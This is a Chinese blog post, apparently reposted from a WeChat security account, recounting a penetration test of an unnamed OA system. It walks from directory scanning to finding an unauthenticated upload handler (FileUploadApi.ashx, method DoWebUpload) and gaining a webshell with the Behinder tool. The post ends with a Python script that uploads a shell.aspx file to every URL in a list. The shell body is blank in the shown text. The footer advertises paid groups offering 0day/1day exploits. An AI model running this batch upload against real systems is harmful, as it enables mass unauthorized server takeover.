记一次某OA渗透测试有意思的文件上传漏洞挖掘经历以及分析

admin

138858
文章

114
评论

2025年1月3日13:44:09评论18 views字数 2142阅读7分8秒阅读模式

扫码加圈子

获内部资料

网络安全领域各种资源，学习文档，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具，欢迎关注。

原文链接：https://xz.aliyun.com/t/16959

作者：1674701160110592

0x1 登录

我这边首先找到的是一个文件上传的登陆框

测试了一下sql注入之类的，发现没有

0x2 目录扫描

看到api爆出200 ok的那一刻我的心情是激动的，感觉要有很多接口泄露了

一堆ashx文件加上一个UEditor的组件，ashx

.ashx文件扩展名通常用于表示 ASP.NET 处理程序（ASP.NET Handler）。ASP.NET 处理程序是一种在服务器端处理特定类型请求的代码文件。这些文件通常用于执行一些特殊的服务器任务，如图像生成、文件下载或其他动态内容的处理。

ueditor组件也有一个ashx文件，看着文件名字应该就是用来处理文件上传功能的

我们访问一下

给我返回了这个消息，那么我们可以理解为这个文件应该是要传递一个参数的，但是参数是什么，我们目前还不知道

我爆破了一下参数

依旧是接口错误

难道到手的文件上传getshell（bushi就要没了吗？

0x3 查看前段源代码

查看了一下这个js源码

一搜索就搜到了我那个文件名

那么就是说可以有文件删除和文件上传两个选择，传入DoWebUpload或者DoDelete参数即可

那么我们选择上传一个木马文件试试

直接就上传成功了冰蝎连接试试

直接就是getshell成功了

0x4 批量脚本测试

import requestsimport osos.environ["http_proxy"] = "http://127.0.0.1:7890"os.environ["https_proxy"] = "http://127.0.0.1:7890"def poc(url=""):# 目标URL    url = url+'/api/FileUploadApi.ashx?method=DoWebUpload'    files = {'file': ('shell.aspx', """        """, 'image/png')    }    headers = {'Cache-Control': 'max-age=0','Upgrade-Insecure-Requests': '1','Origin': 'null','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7','Accept-Encoding': 'gzip, deflate, br','Accept-Language': 'zh-CN,zh;q=0.9','Connection': 'keep-alive'    }    try:        # 发送POST请求        response = requests.post(url, files=files, headers=headers,timeout=5)        # 打印返回结果print('Response Code:', response.status_code)print('Response Text:', response.text)    except Exception as e:print(e)if __name__ == '__main__':    file_path = 'url'    with open(file_path, 'r', encoding='utf-8') as file:for line in file:print(line.strip())  # 使用 strip() 去掉行末的换行符            poc("http://" + line.strip())    # poc()

0x5 总结

这次感觉这个文件上传藏得还是比较深的，也是告诉自己挖掘一些漏洞的时候，千万不能放过任何一处细节，往往细节决定成败。

我们是神农安全，点赞 + 在看 铁铁们点起来，最后祝大家都能心想事成、发大财、行大运。

内部圈子介绍

圈子专注于更新src相关：

1、维护更新src专项漏洞知识库，包含原理、挖掘技巧、实战案例2、分享src优质视频课程3、分享src挖掘技巧tips4、微信小群一起挖洞5、不定期有众测、渗透测试项目6、需要职业技能大赛环境dd我

申明：本公众号所分享内容仅用于网络安全技术讨论，切勿用于违法途径，
所有渗透都需获取授权，违者后果自行承担，与本号及作者无关，请谨记守法.

欢迎加入星球一起交流，券后价仅40元！！！ 即将满200人涨价

长期更新，更多的0day/1day漏洞POC/EXP

原文始发于微信公众号（神农Sec）：记一次某OA渗透测试有意思的文件上传漏洞挖掘经历以及分析

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

记一次某OA渗透测试有意思的文件上传漏洞挖掘经历以及分析

文件上传黑名单限制的绕过总结

metasploit（1）生成远控木马

Ghost

利用Claude3.7分析wireshark流量包

JS逆向 —— 基于 gRPC 的加解密对抗

Nyx-1 综合靶机实战思路

打靶日记 Pinkys Palace v2

内存取证 - 练习篇3(Lovelymem一把梭)

一文玩转验证码漏洞

HTB_Nocturnal

发表评论

在线咨询

微信